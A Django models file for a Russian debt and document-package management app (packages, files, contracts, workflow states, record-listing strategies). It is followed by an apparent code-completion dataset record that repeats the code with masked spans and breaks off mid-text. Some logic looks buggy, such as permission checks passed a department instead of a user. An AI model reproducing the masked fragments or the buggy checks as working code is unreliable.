return f"{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}"
def save(self, *args, **kwargs):
instance = SignUser.objects.get(id=self.id)
if self.sign != instance.sign and instance.sign:
if os.path.exists(instance.sign.url):
os.remove(instance.sign.url)
super().save(*args, **kwargs)
class Meta:
verbose_name_plural = "Отвественные лица с правом подписи"
class Commentary(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL,
on_delete=models.CASCADE, blank=True, null=True)
commentary_text = models.TextField('Комментарий', blank=True, null=True)
creation_date = models.DateTimeField('Дата создания', auto_now_add=True)
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
class AbstractFileModel(models.Model):
file_name = models.CharField('Название файла', max_length=255,
null=True, blank=True)
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
creation_date = models.DateField('Дата создания файла',
blank=True, null=True)
# Подгрузка произвольного количества файлов
content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)
object_id = models.PositiveIntegerField()
content_object = GenericForeignKey('content_type', 'object_id')
file_type = models.ForeignKey('DocumentTypeModel',
on_delete=models.CASCADE)
def delete(self, using=None, keep_parents=False):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
return super().delete(using=using, keep_parents=keep_parents)
class Meta:
abstract = True
class SingleFile(AbstractFileModel):
def __str__(self):
return str(self.file_type)
class Meta:
verbose_name_plural = "Единичные файлы"
class PackFile(AbstractFileModel):
unique_number = models.ForeignKey('SyncUniqueNumber',
on_delete=models.CASCADE,
null=True, blank=True)
class Meta:
abstract = False
verbose_name_plural = "Фаилы набора"
def initialize_folder(self, path: str):
if self.file_type:
tmp_str_path = plur_form(self.file_type.doc_type)
if not os.path.isdir(f'{path}/{tmp_str_path}/'):
os.makedirs(f'{path}/{tmp_str_path}/')
else:
raise AttributeError()
def get_files_path(self, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
self.initialize_folder(tmp_path)
return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')
def other_files_directory_path(instance, filename):
p = instance.content_object.get_save_path()
return '{0}/прочие/{1}'.format(p, filename)
class OtherFile(AbstractFileModel):
file_obj = models.FileField('Произвольные файлы',
upload_to=other_files_directory_path,
max_length=500)
commentary = GenericRelation(Commentary, related_query_name='file')
class Meta:
verbose_name_plural = "Прочие файлы"
class ActExam(models.Model):
FOLDER = 'Акт осмотра/'
file_path = models.CharField('Путь', max_length=255, blank=True, null=True)
file_name = models.CharField('Название файла', max_length=255,
null=True, blank=True)
@classmethod
def initialize_folder(cls, path: str):
tmp_path = f'{path}/{cls.FOLDER}'
if not os.path.isdir(tmp_path):
os.makedirs(tmp_path)
@classmethod
def get_files_path(cls, package: 'DocumentsPackage'):
tmp_path = package.get_save_path()
ActExam.initialize_folder(tmp_path)
return os.path.join(tmp_path, cls.FOLDER)
def clear_file(self):
if os.path.exists(str_add_app(self.file_path)):
os.remove(str_add_app(self.file_path))
self.file_path = None
self.file_name = None
self.save()
def delete(self, using=None, keep_parents=False):
self.clear_file()
return super().delete(using=using, keep_parents=keep_parents)
class DocumentsPackage(models.Model):
""" Модель пакета документов.
contragent - ID контрагента
name_uuid - Уникальный ID пакета (каждый раз новый)
is_active - Является ли пакет активным. Если True, то пакет в работе. Если
False, то пакет закрыт.
is_automatic - Создан ли пакет автоматически или пользователь может
редактировать наборы файлов и некоторые характеристики. Если
True, то нельзя подгружать свои договора и редактировать
debt_plan. Если False, то редактирование возможно.
creation_date - Дата создания пакета.
debt_plan - Сумма долга. Если is_automatic == True, то значение не
редактируется. Если is_automatic == False, то значение
необходимо заполнить.
debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.
tax_count - Госпошлина. Можно заполнять в любом случае.
package_users - Все пользователи пакета, работавшие с ним.
package_state - Состояние пакета.
package_state_date - Дата изменения состояния пакета.
single_files - Пакет одиночных документов.
pack_files - Пакет наборов файлов.
other_files - Произвольные файлы.
commentary - Комментарии.
"""
contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,
related_name='contragents',
related_query_name='contragent',
null=True, blank=True)
name_uuid = models.CharField('Идентификатор пакета', max_length=255,
default=uuid.uuid4, null=True, blank=True,
editable=False)
is_active = models.BooleanField('Активный пакет', default=True)
is_automatic = models.BooleanField('Создан автоматически', default=True)
creation_date = models.DateField('Дата создания пакета', auto_now_add=True)
debt_plan = models.FloatField('Сумма задолжности (плановая)',
default=0.00)
debt_fact = models.FloatField('Сумма задолжности (фактическая)',
default=0.00)
tax_count = models.FloatField('Госпошлина', default=0.00)
package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,
related_name='packages')
package_state = models.ForeignKey('State', on_delete=models.CASCADE,
null=True, blank=True)
package_state_date = models.DateField('Дата последнего действия',
null=True, blank=True)
single_files = GenericRelation(SingleFile)
pack_files = GenericRelation(PackFile)
other_files = GenericRelation(OtherFile)
commentary = GenericRelation(Commentary, related_query_name='package')
act = models.ForeignKey(ActExam, on_delete=models.CASCADE,
null=True, blank=True)
def __str__(self):
return f'Пакет {self.name_uuid}'
def get_save_path(self):
if self.contragent:
return os.path.join(self.contragent.get_str_as_path(),
str(self.name_uuid))
else:
return f'{self.name_uuid}'
@classmethod
def get_active_package(cls, contragent: Contragent):
try:
res = cls.objects.get(contragent__id=contragent.pk, is_active=True)
return res
except ObjectDoesNotExist:
return None
def initialize_sub_folders(self):
os.makedirs(str(self.get_save_path()), exist_ok=True)
def is_user_in_package(self, user, use_department=False):
users = self.package_users.all()
if use_department:
depts = [tmp_user.department for tmp_user in users]
return (user.department in depts) or (user in users)
return user in users
def set_inactive(self):
self.is_active = False
self.save()
def change_state_to(self, new_state, is_backward):
self.package_state = new_state
self.package_state_date = datetime.date.today()
if not is_backward:
async_task(calc_create_gen_async, self.contragent, self, False,
group=self.name_uuid)
# TODO Journal log here!
self.save()
class Meta:
verbose_name_plural = "Пакеты документов"
class DocumentStateEntity(models.Model):
documents = models.ManyToManyField('DocumentTypeModel',
related_name='document_type')
states = models.ForeignKey('State', related_name='states',
on_delete=models.CASCADE,
blank=True, null=True)
template = models.ForeignKey('DocumentFileTemplate',
on_delete=models.CASCADE,
blank=True, null=True)
class DocumentFileTemplate(models.Model):
contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
is_package = models.BooleanField('Набор файлов', default=False)
def __str__(self):
return KLASS_TYPES[self.contagent_type][1]
class Meta:
verbose_name_plural = "Шаблоны файлов"
# class SingleFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны единичных файлов"
# class PackFilesTemplate(models.Model):
# contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)
# documents = models.ManyToManyField('DocumentTypeModel',
# related_name='document_type_pack')
# def __str__(self):
# return KLASS_TYPES[self.contagent_type][1]
# class Meta:
# verbose_name_plural = "Шаблоны наборов файлов"
class NormativeCategory(models.Model):
""" Класс Категории норматива """
name = models.CharField('Вид объекта',
max_length=255)
norm_type = models.IntegerField('Показатель расчета', default=0,
choices=NORM_TYPE, blank=True, null=True)
normative = models.ManyToManyField('Normative', related_name='normatives',
verbose_name='Нормативы')
def __str__(self):
return self.name
@property
def print_norm_type(self):
return NORM_TYPE[self.norm_type][1]
class Meta:
verbose_name_plural = "Категории нормативов"
class Normative(models.Model):
""" Класс норматива """
since_date = models.DateField('Дата начала действия норматива',
null=True, blank=True)
up_to_date = models.DateField('Дата окончания действия норматива',
null=True, blank=True)
value = models.FloatField('Значение норматива (год.)',
null=True, blank=True)
def __str__(self):
return (f'Норматив: {self.value}/год.,'
+ f' действующий с {self.since_date.strftime("%d.%m.%Y")}'
+ f' по {self.up_to_date.strftime("%d.%m.%Y")}')
class Meta:
verbose_name_plural = "Нормативы"
class Contract(models.Model):
""" Класс контракта. Нужен что бы получать уникальный номер контракта.
Сохраняет дату когда был создан, для корректной генерации строкового
представления.
"""
date_field = models.DateField(auto_now_add=True)
def __str__(self):
return f'{self.pk:06}-{(self.date_field).year}/ТКО/01'
class Meta:
verbose_name_plural = "Сгенерированые номера договоров"
class ContractNumberClass(models.Model):
""" Модель класса прокси для соединения класса документа и контрагента.
Принимает на вход необязательные параметры:
new - определяем, надо генерировать новый номер или есть
старый. Булево значение. True = генерируем;
exist_number - существующий номер договора. Строка;
У класса есть такие поля как:
is_generated - хранит булево значение. Определяет был ли сгенерирован
номер или взят из внешних источников;
contract_obj - объект модели самого номера контракта;
contract_exist_number - существующий номер контракта. Пустая строка,
если мы сгенерировали новый номер;
contract_number - возвращает строковое представление номера, независимо
от того, сгенерирован код или получен из внешнего
источника.
"""
is_generated = models.BooleanField(default=False)
contract_obj = models.OneToOneField(Contract,
on_delete=models.CASCADE,
null=True, blank=True)
contract_exist_number = models.CharField(default='',
max_length=255,
null=True, blank=True)
@classmethod
def create(cls, new: bool = False, exist_number: str = ''):
contract_num_obj = cls(is_generated=new)
if new:
contract_num_obj.contract_obj = Contract.objects.create()
else:
contract_num_obj.contract_exist_number = exist_number
contract_num_obj.save()
return contract_num_obj
@property
def contract_number(self):
if self.is_generated:
return str(self.contract_obj)
else:
return self.contract_exist_number
def __str__(self):
return self.contract_number
class Meta:
verbose_name_plural = "Номера договоров"
class SyncUniqueNumber(models.Model):
def __str__(self):
return f'{self.pk:08}/01'
class Meta:
verbose_name_plural = "Номера документов"
class CityModel(models.Model):
name = models.CharField('Город', max_length=255, null=True, blank=True)
def __str__(self):
return self.name
class Meta:
verbose_name_plural = "Города"
class TemplateModel(models.Model):
template_path = models.CharField('Путь до шаблона', max_length=255)
city = models.ForeignKey(CityModel, on_delete=models.CASCADE)
contragent_type = models.IntegerField('Тип контрагента',
choices=KLASS_TYPES, default=0)
document_type = models.ForeignKey('DocumentTypeModel',
verbose_name='Тип документа',
on_delete=models.CASCADE)
def __str__(self):
return f'{str(self.document_type)}|\
{KLASS_TYPES[self.contragent_type][1]}|{self.city}'
class Meta:
verbose_name_plural = "Шаблоны документов"
class DocumentTypeModel(models.Model):
doc_type = models.CharField('Тип документа', max_length=255,
null=True, blank=True)
is_pack = models.BooleanField('Пакет документов', default=False)
def __str__(self):
return self.doc_type
class Meta:
verbose_name_plural = "Типы документов"
#########
# State #
#########
class State(models.Model):
name_state = models.CharField('Состояние', max_length=255)
departments = models.ManyToManyField('yellowbird.Department',
verbose_name='Отделы',
related_name='available_states')
is_initial_state = models.BooleanField('Начальное состояние',
default=False)
is_final_state = models.BooleanField('Конечное состояние', default=False)
def get_linked_events(self):
return Event.objects.filter(from_state=self.id)
def _is_dept_permitted(self, department):
return department in self.departments.all()
def is_permitted(self, user):
return (user.is_superuser or user.is_staff
or self._is_dept_permitted(user.department))
def __str__(self):
return self.name_state
class Meta:
verbose_name_plural = 'Состояния'
class Event(models.Model):
name_event = models.CharField('Событие', max_length=255)
from_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Исходное состояние',
blank=True, null=True,
related_name='begin_states')
to_state = models.ForeignKey(State, on_delete=models.CASCADE,
verbose_name='Конечное состояние',
blank=True, null=True,
related_name='end_states')
is_move_backward = models.BooleanField('Двигаемся обратно назад',
default=False)
def __str__(self):
return self.name_event
class Meta:
verbose_name_plural = 'События'
##############
# Strategies #
##############
class ListStrategy(ABC):
@abstractmethod
def execute_list_strategy(self, user):
raise NotImplementedError
@abstractmethod
def execute_single_strategy(self, pk, user):
raise NotImplementedError
class OnlyEmptyRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return [c for c in contragents if not c.active_package]
def execute_single_strategy(self, pk, user):
try:
res = Contragent.objects.get(pk=pk)
return res if (not res.active_package) else None
except Contragent.DoesNotExist:
return None
class OnlyMyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.filter(current_user__contain=user)
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk, current_user__contain=user)
except Contragent.DoesNotExist:
return None
class AllRecords(ListStrategy):
def execute_list_strategy(self, user):
contragents = Contragent.objects.all()
return contragents
def execute_single_strategy(self, pk, user):
try:
return Contragent.objects.get(pk=pk)
except Contragent.DoesNotExist:
return None
class AllInDepartmentRecords(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user.department):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_list = [c.department == user.department
for c in contragent.current_user]
if any(tmp_list):
return contragent
return None
return contragent
except Contragent.DoesNotExist:
return None
class MyAndEmptyRecordsStrategy(ListStrategy):
def execute_list_strategy(self, user):
res = list()
contragents = Contragent.objects.all()
for c in contragents:
tmp_pack = c.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and (
user in c.current_user):
res.append(c)
else:
res.append(c)
else:
res.append(c)
return res
def execute_single_strategy(self, pk, user):
try:
contragent = Contragent.objects.get(pk=pk)
tmp_pack = contragent.get_active_package()
if tmp_pack:
tmp_state = tmp_pack.package_state
if tmp_state:
if tmp_state.is_permitted(user) and (
user in contragent.current_user):
return contragent
return contragent
except Contragent.DoesNotExist:
return None
STRATEGIES_LIST = ['Мои записи и пустые', 'Все по отделу', 'Все',
'Только мои записи', 'Только пустые записи']
STRATEGIES_TUPLES = list(enumerate(STRATEGIES_LIST))
STRATEGIES_FUNCTIONS = [MyAndEmptyRecordsStrategy, AllInDepartmentRecords,
AllRecords, OnlyMyRecordsStrategy, OnlyEmptyRecords]
STRATEGIES = dict(zip(STRATEGIES_LIST, STRATEGIES_FUNCTIONS))
ZIP_FILES_ACTIONS = {
0: "Скачать весь пакет",
1: "Скачать основные файлы",
2: "Скачать акты",
3: "Скачать счета",
4: "Скачать счета фактуры",
5: "Скачать прочие файлы",
}
|
flexible
|
{
"blob_id": "9da995184641525cd763ecdb0bca4f28159ae740",
"index": 7617,
"step-1": "<mask token>\n\n\nclass ActExam(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n @classmethod\n def get_files_path(cls, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n ActExam.initialize_folder(tmp_path)\n return os.path.join(tmp_path, cls.FOLDER)\n\n def clear_file(self):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n self.file_path = None\n self.file_name = None\n self.save()\n\n def delete(self, using=None, keep_parents=False):\n self.clear_file()\n return super().delete(using=using, keep_parents=keep_parents)\n\n\nclass DocumentsPackage(models.Model):\n \"\"\" Модель пакета документов.\n contragent - ID контрагента\n name_uuid - Уникальный ID пакета (каждый раз новый)\n is_active - Является ли пакет активным. Если True, то пакет в работе. Если\n False, то пакет закрыт.\n is_automatic - Создан ли пакет автоматически или пользователь может\n редактировать наборы файлов и некоторые характеристики. Если\n True, то нельзя подгружать свои договора и редактировать\n debt_plan. Если False, то редактирование возможно.\n creation_date - Дата создания пакета.\n debt_plan - Сумма долга. Если is_automatic == True, то значение не\n редактируется. Если is_automatic == False, то значение\n необходимо заполнить.\n debt_fact - Сумма долга по факту. Заполняется при сторнировании или оплате.\n tax_count - Госпошлина. Можно заполнять в любом случае.\n package_users - Все пользователи пакета, работавшие с ним.\n package_state - Состояние пакета.\n package_state_date - Дата изменения состояния пакета.\n single_files - Пакет одиночных документов. \n pack_files - Пакет наборов файлов.\n other_files - Произвольные файлы.\n commentary - Комментарии.\n \"\"\"\n contragent = models.ForeignKey(Contragent, on_delete=models.CASCADE,\n related_name='contragents', related_query_name='contragent', null=\n True, blank=True)\n name_uuid = models.CharField('Идентификатор пакета', max_length=255,\n default=uuid.uuid4, null=True, blank=True, editable=False)\n is_active = models.BooleanField('Активный пакет', default=True)\n is_automatic = models.BooleanField('Создан автоматически', default=True)\n creation_date = models.DateField('Дата создания пакета', auto_now_add=True)\n debt_plan = models.FloatField('Сумма задолжности (плановая)', default=0.0)\n debt_fact = models.FloatField('Сумма задолжности (фактическая)',\n default=0.0)\n tax_count = models.FloatField('Госпошлина', default=0.0)\n package_users = models.ManyToManyField(settings.AUTH_USER_MODEL,\n related_name='packages')\n package_state = models.ForeignKey('State', on_delete=models.CASCADE,\n null=True, blank=True)\n package_state_date = models.DateField('Дата последнего действия', null=\n True, blank=True)\n single_files = GenericRelation(SingleFile)\n pack_files = GenericRelation(PackFile)\n other_files = GenericRelation(OtherFile)\n commentary = GenericRelation(Commentary, related_query_name='package')\n act = models.ForeignKey(ActExam, on_delete=models.CASCADE, null=True,\n blank=True)\n\n def __str__(self):\n return f'Пакет {self.name_uuid}'\n\n def get_save_path(self):\n if self.contragent:\n return os.path.join(self.contragent.get_str_as_path(), str(self\n .name_uuid))\n else:\n return f'{self.name_uuid}'\n\n @classmethod\n def get_active_package(cls, contragent: Contragent):\n try:\n res = cls.objects.get(contragent__id=contragent.pk, is_active=True)\n return res\n except ObjectDoesNotExist:\n return None\n\n def initialize_sub_folders(self):\n os.makedirs(str(self.get_save_path()), exist_ok=True)\n\n def is_user_in_package(self, user, use_department=False):\n users = self.package_users.all()\n if use_department:\n depts = [tmp_user.department for tmp_user in users]\n return user.department in depts or user in users\n return user in users\n\n def set_inactive(self):\n self.is_active = False\n self.save()\n\n def change_state_to(self, new_state, is_backward):\n self.package_state = new_state\n self.package_state_date = datetime.date.today()\n if not is_backward:\n async_task(calc_create_gen_async, self.contragent, self, False,\n group=self.name_uuid)\n self.save()\n\n\n class Meta:\n verbose_name_plural = 'Пакеты документов'\n\n\nclass DocumentStateEntity(models.Model):\n documents = models.ManyToManyField('DocumentTypeModel', related_name=\n 'document_type')\n states = models.ForeignKey('State', related_name='states', on_delete=\n models.CASCADE, blank=True, null=True)\n template = models.ForeignKey('DocumentFileTemplate', on_delete=models.\n CASCADE, blank=True, null=True)\n\n\nclass DocumentFileTemplate(models.Model):\n contagent_type = models.IntegerField(choices=KLASS_TYPES, default=0)\n is_package = models.BooleanField('Набор файлов', default=False)\n\n def __str__(self):\n return KLASS_TYPES[self.contagent_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны файлов'\n\n\nclass NormativeCategory(models.Model):\n \"\"\" Класс Категории норматива \"\"\"\n name = models.CharField('Вид объекта', max_length=255)\n norm_type = models.IntegerField('Показатель расчета', default=0,\n choices=NORM_TYPE, blank=True, null=True)\n normative = models.ManyToManyField('Normative', related_name=\n 'normatives', verbose_name='Нормативы')\n\n def __str__(self):\n return self.name\n\n @property\n def print_norm_type(self):\n return NORM_TYPE[self.norm_type][1]\n\n\n class Meta:\n verbose_name_plural = 'Категории нормативов'\n\n\nclass Normative(models.Model):\n \"\"\" Класс норматива \"\"\"\n since_date = models.DateField('Дата начала действия норматива', null=\n True, blank=True)\n up_to_date = models.DateField('Дата окончания действия норматива', null\n =True, blank=True)\n value = models.FloatField('Значение норматива (год.)', null=True, blank\n =True)\n\n def __str__(self):\n return (f'Норматив: {self.value}/год.,' +\n f\" действующий с {self.since_date.strftime('%d.%m.%Y')}\" +\n f\" по {self.up_to_date.strftime('%d.%m.%Y')}\")\n\n\n class Meta:\n verbose_name_plural = 'Нормативы'\n\n\nclass Contract(models.Model):\n \"\"\" Класс контракта. Нужен что бы получать уникальный номер контракта.\n Сохраняет дату когда был создан, для корректной генерации строкового\n представления.\n \"\"\"\n date_field = models.DateField(auto_now_add=True)\n\n def __str__(self):\n return f'{self.pk:06}-{self.date_field.year}/ТКО/01'\n\n\n class Meta:\n verbose_name_plural = 'Сгенерированые номера договоров'\n\n\nclass ContractNumberClass(models.Model):\n \"\"\" Модель класса прокси для соединения класса документа и контрагента.\n\n Принимает на вход необязательные параметры:\n new - определяем, надо генерировать новый номер или есть\n старый. Булево значение. True = генерируем;\n exist_number - существующий номер договора. Строка;\n\n У класса есть такие поля как:\n is_generated - хранит булево значение. Определяет был ли сгенерирован\n номер или взят из внешних источников;\n contract_obj - объект модели самого номера контракта;\n contract_exist_number - существующий номер контракта. Пустая строка,\n если мы сгенерировали новый номер;\n contract_number - возвращает строковое представление номера, независимо\n от того, сгенерирован код или получен из внешнего\n источника.\n \"\"\"\n is_generated = models.BooleanField(default=False)\n contract_obj = models.OneToOneField(Contract, on_delete=models.CASCADE,\n null=True, blank=True)\n contract_exist_number = models.CharField(default='', max_length=255,\n null=True, blank=True)\n\n @classmethod\n def create(cls, new: bool=False, exist_number: str=''):\n contract_num_obj = cls(is_generated=new)\n if new:\n contract_num_obj.contract_obj = Contract.objects.create()\n else:\n contract_num_obj.contract_exist_number = exist_number\n contract_num_obj.save()\n return contract_num_obj\n\n @property\n def contract_number(self):\n if self.is_generated:\n return str(self.contract_obj)\n else:\n return self.contract_exist_number\n\n def __str__(self):\n return self.contract_number\n\n\n class Meta:\n verbose_name_plural = 'Номера договоров'\n\n\nclass SyncUniqueNumber(models.Model):\n\n def __str__(self):\n return f'{self.pk:08}/01'\n\n\n class Meta:\n verbose_name_plural = 'Номера документов'\n\n\nclass CityModel(models.Model):\n name = models.CharField('Город', max_length=255, null=True, blank=True)\n\n def __str__(self):\n return self.name\n\n\n class Meta:\n verbose_name_plural = 'Города'\n\n\nclass TemplateModel(models.Model):\n template_path = models.CharField('Путь до шаблона', max_length=255)\n city = models.ForeignKey(CityModel, on_delete=models.CASCADE)\n contragent_type = models.IntegerField('Тип контрагента', choices=\n KLASS_TYPES, default=0)\n document_type = models.ForeignKey('DocumentTypeModel', verbose_name=\n 'Тип документа', on_delete=models.CASCADE)\n\n def __str__(self):\n return (\n f'{str(self.document_type)}| {KLASS_TYPES[self.contragent_type][1]}|{self.city}'\n )\n\n\n class Meta:\n verbose_name_plural = 'Шаблоны документов'\n\n\nclass DocumentTypeModel(models.Model):\n doc_type = models.CharField('Тип документа', max_length=255, null=True,\n blank=True)\n is_pack = models.BooleanField('Пакет документов', default=False)\n\n def __str__(self):\n return self.doc_type\n\n\n class Meta:\n verbose_name_plural = 'Типы документов'\n\n\nclass State(models.Model):\n name_state = models.CharField('Состояние', max_length=255)\n departments = models.ManyToManyField('yellowbird.Department',\n verbose_name='Отделы', related_name='available_states')\n is_initial_state = models.BooleanField('Начальное состояние', default=False\n )\n is_final_state = models.BooleanField('Конечное состояние', default=False)\n\n def get_linked_events(self):\n return Event.objects.filter(from_state=self.id)\n\n def _is_dept_permitted(self, department):\n return department in self.departments.all()\n\n def is_permitted(self, user):\n return user.is_superuser or user.is_staff or self._is_dept_permitted(\n user.department)\n\n def __str__(self):\n return self.name_state\n\n\n class Meta:\n verbose_name_plural = 'Состояния'\n\n\nclass Event(models.Model):\n name_event = models.CharField('Событие', max_length=255)\n from_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Исходное состояние', blank=True, null=True,\n related_name='begin_states')\n to_state = models.ForeignKey(State, on_delete=models.CASCADE,\n verbose_name='Конечное состояние', blank=True, null=True,\n related_name='end_states')\n is_move_backward = models.BooleanField('Двигаемся обратно назад',\n default=False)\n\n def __str__(self):\n return self.name_event\n\n\n class Meta:\n verbose_name_plural = 'События'\n\n\nclass ListStrategy(ABC):\n\n @abstractmethod\n def execute_list_strategy(self, user):\n raise NotImplementedError\n\n @abstractmethod\n def execute_single_strategy(self, pk, user):\n raise NotImplementedError\n\n\nclass OnlyEmptyRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return [c for c in contragents if not c.active_package]\n\n def execute_single_strategy(self, pk, user):\n try:\n res = Contragent.objects.get(pk=pk)\n return res if not res.active_package else None\n except Contragent.DoesNotExist:\n return None\n\n\nclass OnlyMyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.filter(current_user__contain=user)\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk, current_user__contain=user)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n contragents = Contragent.objects.all()\n return contragents\n\n def execute_single_strategy(self, pk, user):\n try:\n return Contragent.objects.get(pk=pk)\n except Contragent.DoesNotExist:\n return None\n\n\nclass AllInDepartmentRecords(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user.department):\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_list = [(c.department == user.department) for c in\n contragent.current_user]\n if any(tmp_list):\n return contragent\n return None\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\nclass MyAndEmptyRecordsStrategy(ListStrategy):\n\n def execute_list_strategy(self, user):\n res = list()\n contragents = Contragent.objects.all()\n for c in contragents:\n tmp_pack = c.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user) and user in c.current_user:\n res.append(c)\n else:\n res.append(c)\n else:\n res.append(c)\n return res\n\n def execute_single_strategy(self, pk, user):\n try:\n contragent = Contragent.objects.get(pk=pk)\n tmp_pack = contragent.get_active_package()\n if tmp_pack:\n tmp_state = tmp_pack.package_state\n if tmp_state:\n if tmp_state.is_permitted(user\n ) and user in contragent.current_user:\n return contragent\n return contragent\n except Contragent.DoesNotExist:\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SignUser(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return f'{proper_last_name(self.name)}, {POST_TYPE[self.position][1]}'\n <mask token>\n\n\n class Meta:\n verbose_name_plural = 'Отвественные лица с правом подписи'\n\n\nclass Commentary(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.\n CASCADE, blank=True, null=True)\n commentary_text = models.TextField('Комментарий', blank=True, null=True)\n creation_date = models.DateTimeField('Дата создания', auto_now_add=True)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n\n\nclass AbstractFileModel(models.Model):\n file_name = models.CharField('Название файла', max_length=255, null=\n True, blank=True)\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n creation_date = models.DateField('Дата создания файла', blank=True,\n null=True)\n content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n object_id = models.PositiveIntegerField()\n content_object = GenericForeignKey('content_type', 'object_id')\n file_type = models.ForeignKey('DocumentTypeModel', on_delete=models.CASCADE\n )\n\n def delete(self, using=None, keep_parents=False):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n return super().delete(using=using, keep_parents=keep_parents)\n\n\n class Meta:\n abstract = True\n\n\nclass SingleFile(AbstractFileModel):\n\n def __str__(self):\n return str(self.file_type)\n\n\n class Meta:\n verbose_name_plural = 'Единичные файлы'\n\n\nclass PackFile(AbstractFileModel):\n unique_number = models.ForeignKey('SyncUniqueNumber', on_delete=models.\n CASCADE, null=True, blank=True)\n\n\n class Meta:\n abstract = False\n verbose_name_plural = 'Фаилы набора'\n\n def initialize_folder(self, path: str):\n if self.file_type:\n tmp_str_path = plur_form(self.file_type.doc_type)\n if not os.path.isdir(f'{path}/{tmp_str_path}/'):\n os.makedirs(f'{path}/{tmp_str_path}/')\n else:\n raise AttributeError()\n\n def get_files_path(self, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n self.initialize_folder(tmp_path)\n return os.path.join(tmp_path, f'{plur_form(self.file_type.doc_type)}/')\n\n\n<mask token>\n\n\nclass OtherFile(AbstractFileModel):\n file_obj = models.FileField('Произвольные файлы', upload_to=\n other_files_directory_path, max_length=500)\n commentary = GenericRelation(Commentary, related_query_name='file')\n\n\n class Meta:\n verbose_name_plural = 'Прочие файлы'\n\n\nclass ActExam(models.Model):\n FOLDER = 'Акт осмотра/'\n file_path = models.CharField('Путь', max_length=255, blank=True, null=True)\n file_name = models.CharField('Название файла', max_length=255, null=\n True, blank=True)\n\n @classmethod\n def initialize_folder(cls, path: str):\n tmp_path = f'{path}/{cls.FOLDER}'\n if not os.path.isdir(tmp_path):\n os.makedirs(tmp_path)\n\n @classmethod\n def get_files_path(cls, package: 'DocumentsPackage'):\n tmp_path = package.get_save_path()\n ActExam.initialize_folder(tmp_path)\n return os.path.join(tmp_path, cls.FOLDER)\n\n def clear_file(self):\n if os.path.exists(str_add_app(self.file_path)):\n os.remove(str_add_app(self.file_path))\n self.file_path = None\n self.file_name = None\n self.save()\n\n def delete(self, using=None, keep_parents=False):\n self.clear_file()\n return super().delete(using=using, keep_parents=keep_parents)\n\n\nclass DocumentsPackage(models.Model):\n \"\"\" Модель пакета документов.\n contragent - ID контрагента\n name_uuid - Уникальный ID пакета (каждый раз новый)\n is_active - Является ли пакет активным. Если True, то пакет в работе. Если\n False, то пакет закрыт.\n is_automatic - Создан ли пакет автоматически или пользователь может\n редактировать наборы файлов и некоторые характеристики. Если\n True, то нельзя подгружать свои договора и редактировать\n debt_plan. Если False, то редактирование возможно.\n creation_date - Дата создания пакета.\n debt_plan - Сумма долга. Если is_automatic == True, то значение не\n редактируется. Если is_automatic == 